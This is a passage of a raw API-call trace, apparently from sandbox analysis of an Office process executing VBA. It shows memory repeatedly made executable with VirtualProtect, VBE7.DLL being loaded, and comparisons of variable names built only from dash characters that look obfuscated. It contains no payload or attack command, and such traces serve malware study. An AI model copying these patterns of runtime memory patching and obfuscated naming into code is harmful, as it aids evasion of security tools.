flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0114.009] GetCurrentProcess () returned 0xffffffff [0114.009] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8381, dwSize=0x2) returned 1 [0114.009] GetCurrentProcess () returned 0xffffffff [0114.009] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83a0, dwSize=0x14) returned 1 [0114.009] VirtualProtect (in: lpAddress=0xcaa83a0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0114.010] GetCurrentProcess () returned 0xffffffff [0114.010] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83a1, dwSize=0x2) returned 1 [0114.010] GetCurrentProcess () returned 0xffffffff [0114.010] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83c0, dwSize=0x14) returned 1 [0114.010] VirtualProtect (in: lpAddress=0xcaa83c0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0114.011] GetCurrentProcess () returned 0xffffffff [0114.011] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83c1, dwSize=0x2) returned 1 [0114.011] GetCurrentProcess () returned 0xffffffff [0114.011] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83e0, dwSize=0x14) returned 1 [0114.011] VirtualProtect (in: lpAddress=0xcaa83e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0114.011] GetCurrentProcess () returned 0xffffffff [0114.011] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83e1, dwSize=0x2) returned 1 [0114.011] GetCurrentProcess () returned 0xffffffff [0114.011] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8400, dwSize=0x14) returned 1 [0114.011] VirtualProtect (in: lpAddress=0xcaa8400, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0114.012] GetCurrentProcess () returned 0xffffffff [0114.012] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8401, dwSize=0x2) returned 1 [0114.012] GetCurrentProcess () returned 0xffffffff [0114.012] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8420, dwSize=0x14) returned 1 [0114.012] VirtualProtect (in: lpAddress=0xcaa8420, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0114.013] GetCurrentProcess () returned 0xffffffff [0114.013] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8421, dwSize=0x2) returned 1 [0114.013] GetCurrentProcess () returned 0xffffffff [0114.013] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8440, dwSize=0x14) returned 1 [0114.013] VirtualProtect (in: lpAddress=0xcaa8440, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0114.013] GetCurrentProcess () returned 0xffffffff [0114.013] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8441, dwSize=0x2) returned 1 [0114.013] GetCurrentProcess () returned 0xffffffff [0114.013] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8460, dwSize=0x14) returned 1 [0114.014] VirtualProtect (in: lpAddress=0xcaa8460, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0114.019] GetCurrentProcess () returned 0xffffffff [0114.019] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8461, dwSize=0x2) returned 1 [0114.020] GetCurrentProcess () returned 0xffffffff [0114.020] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8480, dwSize=0x14) returned 1 [0114.020] VirtualProtect (in: lpAddress=0xcaa8480, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0114.020] GetCurrentProcess () returned 0xffffffff [0114.020] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8481, dwSize=0x2) returned 1 [0114.020] GetCurrentProcess () returned 0xffffffff [0114.020] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84a0, dwSize=0x14) returned 1 [0114.020] VirtualProtect (in: lpAddress=0xcaa84a0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0114.021] GetCurrentProcess () returned 0xffffffff [0114.021] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84a1, dwSize=0x2) returned 1 [0114.021] GetCurrentProcess () returned 0xffffffff [0114.021] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84c0, dwSize=0x14) returned 1 [0114.021] VirtualProtect (in: lpAddress=0xcaa84c0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0114.022] GetCurrentProcess () returned 0xffffffff [0114.022] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84c1, dwSize=0x2) returned 1 [0114.022] GetCurrentProcess () returned 0xffffffff [0114.022] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6288, dwSize=0x14) returned 1 [0114.022] VirtualProtect (in: lpAddress=0xcaa6288, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0114.022] GetCurrentProcess () returned 0xffffffff [0114.022] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6289, dwSize=0x2) returned 1 [0114.022] GetCurrentProcess () returned 0xffffffff [0114.023] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62a8, dwSize=0x14) returned 1 [0114.023] VirtualProtect (in: lpAddress=0xcaa62a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0114.023] GetCurrentProcess () returned 0xffffffff [0114.023] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62a9, dwSize=0x2) returned 1 [0114.023] GetCurrentProcess () returned 0xffffffff [0114.023] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62c8, dwSize=0x14) returned 1 [0114.023] VirtualProtect (in: lpAddress=0xcaa62c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0114.024] GetCurrentProcess () returned 0xffffffff [0114.024] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62c9, dwSize=0x2) returned 1 [0114.024] SetErrorMode (uMode=0x8001) returned 0x8001 [0114.024] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0114.024] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x681f0000 [0114.025] SetErrorMode (uMode=0x8001) returned 0x8001 [0114.025] GetProcAddress (hModule=0x681f0000, lpProcName=0x256) returned 0x681f74be [0114.026] GetAsyncKeyState (vKey=3) returned 0 [0114.026] CRetailMalloc_Alloc () returned 0xcb05998 [0114.026] memcpy (in: _Dst=0xaf5168, _Src=0x1977c8, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0114.026] memcpy (in: _Dst=0xaf5270, _Src=0x1977e4, _Size=0xc | out: _Dst=0xaf5270) returned 0xaf5270 [0114.027] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9d52fa2, cbMultiByte=6, lpWideCharStr=0x1975e4, cchWideChar=7 | out: lpWideCharStr="Timer") returned 6 [0114.027] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9d100ee, cbMultiByte=6, lpWideCharStr=0x197644, cchWideChar=7 | out: lpWideCharStr="Timer") returned 6 [0114.028] memcpy (in: _Dst=0xaf5168, _Src=0x1977c8, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0114.028] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x96\x96\x97\x97\x96\x96\x97\x96\x96\x96\x97\x96\x96\x97\x97\x97\x97\x96\x97\x96\x96\x96\x96\x96\x96\x97\x97\x96\x96\x96\x96", cchCount1=-1, lpString2="\x96\x96\x96\x97\x96\x96\x97\x97\x97\x96\x96\x97\x96\x97\x97\x97\x96\x96\x96\x97\x97\x97\x96\x97\x96\x97\x97\x96\x97\x96\x97", cchCount2=-1) returned 3 [0114.029] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9d52fc6, cbMultiByte=32, lpWideCharStr=0x1975e4, cchWideChar=33 | out: lpWideCharStr="–––—––———––—–———–––———–—–——–—–—") returned 32 [0114.029] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9d100b2, cbMultiByte=32, lpWideCharStr=0x197644, cchWideChar=33 | out: lpWideCharStr="–––—––———––—–———–––———–—–——–—–—") returned 32 [0114.029] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9d100b2, cbMultiByte=32, lpWideCharStr=0x197644, cchWideChar=33 | out: lpWideCharStr="–––—––———––—–———–––———–—–——–—–—") returned 32 [0114.029] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9d100b2, cbMultiByte=32, lpWideCharStr=0x197644, cchWideChar=33 | out: lpWideCharStr="–––—––———––—–———–––———–—–——–—–—") returned 32 [0114.029] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x96\x96\x97\x97\x96\x96\x97\x96\x96\x96\x97\x96\x96\x97\x97\x97\x97\x96\x97\x96\x96\x96\x96\x96\x96\x97\x97\x96\x96\x96\x96", cchCount1=-1, lpString2="\x96\x96\x96\x97\x96\x96\x97\x97\x97\x96\x96\x97\x96\x97\x97\x97\x96\x96\x96\x97\x97\x97\x96\x97\x96\x97\x97\x96\x97\x96\x97", cchCount2=-1) returned 3 [0114.029] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9d100b2, cbMultiByte=32, lpWideCharStr=0x197644, cchWideChar=33 | out: lpWideCharStr="–––—––———––—–———–––———–—–——–—–—") returned 32 [0114.029] CRetailMalloc_Alloc () returned 0xc849400 [0114.029] _mbscpy_s (in: _Dst=0xc849400, _DstSizeInBytes=0x20, _Src=0x9d100b2 | out: _Dst=0xc849400) returned 0x0 [0114.030] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9d10d06, cbMultiByte=39, lpWideCharStr=0x197654, cchWideChar=40 | out: lpWideCharStr="_B_var_–––—––———––—–———–––———–—–——–—–—") returned 39 [0114.030] _mbscpy_s (in: _Dst=0x1976bc, _DstSizeInBytes=0x20, _Src=0x9d100b2 | out: _Dst=0x1976bc) returned 0x0 [0114.030] CRetailMalloc_Free () returned 0x1 [0114.030] memcpy (in: _Dst=0xaf5270, _Src=0xaf5270, _Size=0xc | out: _Dst=0xaf5270) returned 0xaf5270 [0114.030] memcpy (in: _Dst=0xaf5168, _Src=0x1977c8, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0114.030] memcpy (in: _Dst=0xaf5168, _Src=0x197634, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0114.030] memcpy (in: _Dst=0xaf5168, _Src=0x197634, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0114.030] memcpy (in: _Dst=0xaf5168, _Src=0x197634, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0114.030] memcpy (in: _Dst=0xaf5168, _Src=0x1977c8, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0114.030] memcpy (in: _Dst=0xaf5168, _Src=0x1977c8, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0114.030] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x6842ded0, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0114.030] memcpy (in: _Dst=0xcb05a0c, _Src=0x197864, _Size=0x18 | out: _Dst=0xcb05a0c) returned 0xcb05a0c [0114.030] CRetailMalloc_Realloc () returned 0xcb05998 [0114.030] CRetailMalloc_Free () returned 0x1 [0114.031] GetCurrentProcess () returned 0xffffffff [0114.031] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dcc, dwSize=0x14) returned 1 [0114.031] VirtualProtect (in: lpAddress=0xcaa6dcc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0114.031] GetCurrentProcess () returned 0xffffffff [0114.031] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dcd, dwSize=0x2) returned 1 [0114.031] GetCurrentProcess () returned 0xffffffff [0114.031] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dec, dwSize=0x14) returned 1 [0114.031] VirtualProtect (in: lpAddress=0xcaa6dec, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0114.032] GetCurrentProcess () returned 0xffffffff [0114.032] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ded, dwSize=0x2) returned 1 [0114.032] GetCurrentProcess () returned 0xffffffff [0114.032] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e0c, dwSize=0x14) returned 1 [0114.032] VirtualProtect (in: lpAddress=0xcaa6e0c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0114.033] GetCurrentProcess () returned 0xffffffff [0114.033] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e0d, dwSize=0x2) returned 1 [0114.033] GetCurrentProcess () returned 0xffffffff [0114.033] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e2c, dwSize=0x14) returned 1 [0114.033] VirtualProtect (in: lpAddress=0xcaa6e2c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0114.034] GetCurrentProcess () returned 0xffffffff [0114.034] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e2d, dwSize=0x2) returned 1 [0114.034] GetCurrentProcess () returned 0xffffffff [0114.034] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e4c, dwSize=0x14) returned 1 [0114.034] VirtualProtect (in: lpAddress=0xcaa6e4c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0114.034] GetCurrentProcess () returned 0xffffffff [0114.034] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e4d, dwSize=0x2) returned 1 [0114.034] GetCurrentProcess () returned 0xffffffff [0114.034] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e6c, dwSize=0x14) returned 1 [0114.034] VirtualProtect (in: lpAddress=0xcaa6e6c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0114.035] GetCurrentProcess () returned 0xffffffff [0114.035] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e6d, dwSize=0x2) returned 1 [0114.035] GetCurrentProcess () returned 0xffffffff [0114.035] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e8c, dwSize=0x14) returned 1 [0114.035] VirtualProtect (in: lpAddress=0xcaa6e8c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0114.035] GetCurrentProcess () returned 0xffffffff [0114.035] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e8d, dwSize=0x2) returned 1 [0114.036] GetCurrentProcess () returned 0xffffffff [0114.036] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eac, dwSize=0x14) returned 1 [0114.036] VirtualProtect (in: lpAddress=0xcaa6eac, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0114.036] GetCurrentProcess () returned 0xffffffff [0114.036] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ead, dwSize=0x2) returned 1 [0114.036] GetCurrentProcess () returned 0xffffffff [0114.036] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ecc, dwSize=0x14) returned 1 [0114.036] VirtualProtect (in: lpAddress=0xcaa6ecc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0114.037] GetCurrentProcess () returned 0xffffffff [0114.037] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ecd, dwSize=0x2) returned 1 [0114.037] GetCurrentProcess () returned 0xffffffff [0114.037] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eec, dwSize=0x14) returned 1 [0114.037] VirtualProtect (in: lpAddress=0xcaa6eec, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0114.037] GetCurrentProcess () returned 0xffffffff [0114.037] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eed, dwSize=0x2) returned 1 [0114.037] GetCurrentProcess () returned 0xffffffff [0114.037] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f0c, dwSize=0x14) returned 1 [0114.037] VirtualProtect (in: lpAddress=0xcaa6f0c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0114.038] GetCurrentProcess () returned 0xffffffff [0114.038] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f0d, dwSize=0x2) returned 1 [0114.038] GetCurrentProcess () returned 0xffffffff [0114.038] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f2c, dwSize=0x14) returned 1 [0114.038] VirtualProtect (in: lpAddress=0xcaa6f2c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0114.038] GetCurrentProcess () returned 0xffffffff [0114.039] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f2d, dwSize=0x2) returned 1 [0114.039] GetCurrentProcess () returned 0xffffffff [0114.039] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa82e0, dwSize=0x14) returned 1 [0114.039] VirtualProtect (in: lpAddress=0xcaa82e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0114.039] GetCurrentProcess () returned 0xffffffff [0114.039] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa82e1, dwSize=0x2) returned 1 [0114.039] GetCurrentProcess () returned 0xffffffff [0114.039] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8300, dwSize=0x14) returned 1 [0114.039] VirtualProtect (in: lpAddress=0xcaa8300, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0114.040] GetCurrentProcess () returned 0xffffffff [0114.040] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8301, dwSize=0x2) returned 1 [0114.040] GetCurrentProcess () returned 0xffffffff [0114.040] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8320, dwSize=0x14) returned 1 [0114.040] VirtualProtect (in: lpAddress=0xcaa8320, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0114.040] GetCurrentProcess () returned 0xffffffff [0114.040] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8321, dwSize=0x2) returned 1 [0114.040] GetCurrentProcess () returned 0xffffffff [0114.040] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8340, dwSize=0x14) returned 1 [0114.040] VirtualProtect (in: lpAddress=0xcaa8340, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0114.041] GetCurrentProcess () returned 0xffffffff [0114.041] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8341, dwSize=0x2) returned 1 [0114.041] GetCurrentProcess () returned 0xffffffff [0114.041] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8360, dwSize=0x14) returned 1 [0114.041] VirtualProtect (in: lpAddress=0xcaa8360, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0114.042] GetCurrentProcess () returned 0xffffffff [0114.042] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8361, dwSize=0x2) returned 1 [0114.042] GetCurrentProcess () returned 0xffffffff [0114.042] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8380, dwSize=0x14) returned 1 [0114.042] VirtualProtect (in: lpAddress=0xcaa8380, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0114.042] GetCurrentProcess () returned 0xffffffff [0114.042] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8381, dwSize=0x2) returned 1 [0114.042] GetCurrentProcess () returned 0xffffffff [0114.042] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83a0, dwSize=0x14) returned 1 [0114.042] VirtualProtect (in: lpAddress=0xcaa83a0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0114.043] GetCurrentProcess () returned 0xffffffff [0114.043] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83a1, dwSize=0x2) returned 1 [0114.043] GetCurrentProcess () returned 0xffffffff [0114.043] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83c0, dwSize=0x14) returned 1 [0114.043] VirtualProtect (in: lpAddress=0xcaa83c0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0114.044] GetCurrentProcess () returned 0xffffffff [0114.044] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83c1, dwSize=0x2) returned 1 [0114.044] GetCurrentProcess () returned 0xffffffff [0114.044] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83e0, dwSize=0x14) returned 1 [0114.044] VirtualProtect (in: lpAddress=0xcaa83e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0114.045] GetCurrentProcess () returned 0xffffffff [0114.045] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83e1, dwSize=0x2) returned 1 [0114.045] GetCurrentProcess () returned 0xffffffff [0114.045] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8400, dwSize=0x14) returned 1 [0114.045] VirtualProtect (in: lpAddress=0xcaa8400, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0114.045] GetCurrentProcess () returned 0xffffffff [0114.045] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8401, dwSize=0x2) returned 1 [0114.045] GetCurrentProcess () returned 0xffffffff [0114.045] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8420, dwSize=0x14) returned 1 [0114.045] VirtualProtect (in: lpAddress=0xcaa8420, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0114.046] GetCurrentProcess () returned 0xffffffff [0114.046] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8421, dwSize=0x2) returned 1 [0114.046] GetCurrentProcess () returned 0xffffffff [0114.046] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8440, dwSize=0x14) returned 1 [0114.046] VirtualProtect (in: lpAddress=0xcaa8440, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0114.047] GetCurrentProcess () returned 0xffffffff [0114.047] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8441, dwSize=0x2) returned 1 [0114.047] GetCurrentProcess () returned 0xffffffff [0114.047] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8460, dwSize=0x14) returned 1 [0114.047] VirtualProtect (in: lpAddress=0xcaa8460, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0114.047] GetCurrentProcess () returned 0xffffffff [0114.047] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8461, dwSize=0x2) returned 1 [0114.047] GetCurrentProcess () returned 0xffffffff [0114.047] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8480, dwSize=0x14) returned 1 [0114.047] VirtualProtect (in: lpAddress=0xcaa8480, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0114.048] GetCurrentProcess () returned 0xffffffff [0114.048] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8481, dwSize=0x2) returned 1 [0114.048] GetCurrentProcess () returned 0xffffffff [0114.048] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84a0, dwSize=0x14) returned 1 [0114.048] VirtualProtect (in: lpAddress=0xcaa84a0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0114.048] GetCurrentProcess () returned 0xffffffff [0114.049] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84a1, dwSize=0x2) returned 1 [0114.049] GetCurrentProcess () returned 0xffffffff [0114.049] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84c0, dwSize=0x14) returned 1 [0114.049] VirtualProtect (in: lpAddress=0xcaa84c0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0114.049] GetCurrentProcess () returned 0xffffffff [0114.049] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84c1, dwSize=0x2) returned 1 [0114.049] GetCurrentProcess () returned 0xffffffff [0114.049] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6288, dwSize=0x14) returned 1 [0114.049] VirtualProtect (in: lpAddress=0xcaa6288, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0114.050] GetCurrentProcess () returned 0xffffffff [0114.050] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6289, dwSize=0x2) returned 1 [0114.050] GetCurrentProcess () returned 0xffffffff [0114.050] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62a8, dwSize=0x14) returned 1 [0114.050] VirtualProtect (in: lpAddress=0xcaa62a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0114.050] GetCurrentProcess () returned 0xffffffff [0114.050] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62a9, dwSize=0x2) returned 1 [0114.050] GetCurrentProcess () returned 0xffffffff [0114.050] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62c8, dwSize=0x14) returned 1 [0114.050] VirtualProtect (in: lpAddress=0xcaa62c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19750c | out: lpflOldProtect=0x19750c*=0x40) returned 1 [0114.051] GetCurrentProcess () returned 0xffffffff [0114.051] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62c9, dwSize=0x2) returned 1 [0114.051] SetErrorMode (uMode=0x8001) returned 0x8001 [0114.051] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0114.051] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x681f0000 [0114.051] SetErrorMode (uMode=0x8001) returned 0x8001 [0114.052] GetProcAddress (hModule=0x681f0000, lpProcName=0x217) returned 0x681f741e [0114.053] GetAsyncKeyState (vKey=3) returned 0 [0114.053] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.053] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 